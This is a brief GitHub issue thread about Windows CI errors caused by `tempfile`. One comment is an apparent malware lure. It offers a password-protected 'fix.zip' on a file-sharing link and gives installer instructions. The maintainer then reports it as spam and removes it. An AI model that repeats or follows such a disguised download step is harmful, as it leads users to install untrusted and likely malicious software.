### ISSUE TITLE
Windows CI issues

### ISSUE THREAD

**Issue by chris-langfield** [int-brain-lab/ibl-neuropixel#41]
Go through and fix the Windows CI errors originating from `tempfile`

**Comment by pabloaz10** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by chris-langfield** [comment]
Spam comment with suspicious file link was reported and removed
